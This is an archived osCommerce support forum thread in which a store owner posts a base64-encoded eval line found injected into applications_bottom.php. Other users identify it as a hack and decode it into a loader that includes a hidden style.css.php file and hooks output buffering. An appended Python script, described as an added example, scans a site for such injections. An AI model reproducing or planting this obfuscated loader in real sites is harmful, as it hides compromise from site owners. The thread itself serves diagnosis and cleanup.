Plux - Posted April 13, 2011

I got this code in applications_bottom.php

    <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2ZhdHBpcGUvcHVibGljX2h0bWwvYWRtaW4vaW5jbHVkZXMvbGFuZ3VhZ2VzL2VuZ2xpc2gvaW1hZ2VzL2J1dHRvbnMvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

As it is encoded using base64 it gives me a weird feeling. Should this be there in version 2.2 RC2a?

Guest - Posted April 13, 2011

No that should not be there in stock osC RC2a. You may want to check out the Security thread in this forum for more help and answers.

FIMBLE - Posted April 13, 2011

That looks very much like you have been hacked. You will need to clear that out, or preferably restore from a backup of your store, after deleting the fileset on the server first. Then follow the security suggestions.

Nic

Sometimes you're the dog and sometimes the lamp post

Plux (author) - Posted April 13, 2011

Thanks people. Weird thing is that that was the only infection I could find in all the files....

germ - Posted April 13, 2011

The hack decodes to this:

    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){
      $GLOBALS['mfsn']='/home/fatpipe/public_html/admin/includes/languages/english/images/buttons/style.css.php';
      if(file_exists($GLOBALS['mfsn'])){
        include_once($GLOBALS['mfsn']);
        if(function_exists('gml')&&function_exists('dgobh')){
          ob_start('dgobh');
        }
      }
    }

Look for this hack file:

    /admin/includes/languages/english/images/buttons/style.css.php

There may be others. Once security is compromised treat EVERY FILE as guilty until proven innocent by close inspection.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me -

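Added example, not part of the original thread and not osCommerce code: a Python script that sweeps a store's file tree for other `eval(base64_decode('...'))` injections and lists the `.php` paths each decoded payload references, which is the decoding germ did by hand above. The function names, the regexes and the sample tree (including its `/srv/shop/...` path) are assumptions constructed for this example.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

# Matches eval(base64_decode('<blob>')) anywhere in a file, either quote style.
EVAL_B64 = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)", re.I)
# Quoted string literals ending in .php inside a decoded payload.
PHP_PATH = re.compile(r"['\"]([^'\"]+\.php)['\"]")

def decode_payloads(source):
    """Return the decoded text of every eval(base64_decode('...')) in source."""
    decoded = []
    for match in EVAL_B64.finditer(source):
        try:
            raw = base64.b64decode(match.group(2))
        except (binascii.Error, ValueError):
            continue  # not valid base64, so nothing to report for this hit
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded

def scan_tree(root):
    """Map each flagged .php file under root to [(decoded payload, referenced paths)]."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = [(p, PHP_PATH.findall(p)) for p in decode_payloads(text)]
        if hits:
            findings[str(path)] = hits
    return findings

def demo():
    """Constructed sample tree: one clean file, one carrying an encoded include."""
    payload = ("if(file_exists('/srv/shop/images/style.css.php'))"
               "{include_once('/srv/shop/images/style.css.php');}")
    blob = base64.b64encode(payload.encode()).decode()
    with tempfile.TemporaryDirectory() as root:
        Path(root, "clean.php").write_text("<?php echo 'ok'; ?>")
        Path(root, "applications_bottom.php").write_text(
            f"<?php /**/eval(base64_decode('{blob}')); ?>")
        return {Path(k).name: v for k, v in scan_tree(root).items()}

if __name__ == "__main__":
    for name, hits in demo().items():
        for decoded, paths in hits:
            print(name, "->", sorted(set(paths)))
```

Run against a copy of the site rather than the live docroot, and treat a clean result as covering this one pattern only; every referenced path it prints is a second file to inspect.
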
This topic is now archived and is closed to further replies.